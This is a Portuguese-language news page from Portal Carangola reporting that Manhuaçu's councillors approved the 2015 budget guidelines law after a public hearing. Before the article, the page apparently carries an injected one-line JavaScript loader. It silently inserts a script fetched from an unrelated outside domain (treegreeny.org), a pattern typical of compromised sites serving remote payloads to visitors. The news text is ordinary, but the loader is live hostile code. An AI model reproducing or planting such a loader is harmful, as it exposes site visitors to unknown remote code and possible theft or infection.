;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Manhuaçu-Gestão atuante e participativa: Vereadores aprovam LDO após ouvir comunidade. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Manhuaçu-Gestão atuante e participativa: Vereadores aprovam LDO após ouvir comunidade.

Aprovada na sessão legislativa desta Quinta-feira, 31, o Projeto de Lei nº 038/2014, de autoria do Executivo Municipal, que “dispõe sobre as Diretrizes para a Elaboração da Lei Orçamentária do Município para o Exercício de 2015 e dá outras providências”. Antes da votação deste importante Projeto, a chamada LDO, a Casa Legislativa realizou audiência pública (Terça-feira, 29) para ouvir a comunidade, e, a partir daí, acolher sugestões da população. Os cidadãos tiveram, então, um espaço para se manifestar sobre o que consideram prioridade para melhorar Manhuaçu, em todas as áreas, como Lazer, Educação, Saúde, Cultura, Esporte, Segurança Pública, etc.

Vereador João Gonçalves Linhares Júnior (Inspetor Linhares) propôs alteração no Projeto enviado pela Prefeitura, acrescentando na parte relacionada à Segurança Pública, a previsão para convênios com as Polícias Civil e Militar. O Projeto original do Executivo contemplava somente a Polícia Militar. Ainda no plenário, os demais vereadores fizeram outras alterações no Projeto, adequando-o ao que os cidadãos propuseram na audiência ocorrida esta semana e demais modificações necessárias.

O Presidente Mauricio de Oliveira Júnior destacou que foi muito positiva a abertura da discussão deste Projeto para a comunidade, por meio da audiência pública sobre a LDO. “A Lei foi votada, aprovada e é motivo de muita felicidade para nós, vereadores, porque a Lei de Diretrizes foi construída e adequada de acordo com a vontade popular. Nós inovamos e convidamos o povo para vir discutir a LDO aqui na Câmara. Os cidadãos disseram como querem que este dinheiro público seja gasto. Isto é salutar. A Democracia se engrandece e se fortalece, e, a Câmara cumpre o papel de ser a voz e o poder do cidadão. É um gesto de respeito e de valorização ao servidor público e ao cidadão de Manhuaçu”, afirmou Maurício Júnior.

(Ass. de Comunicação)

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.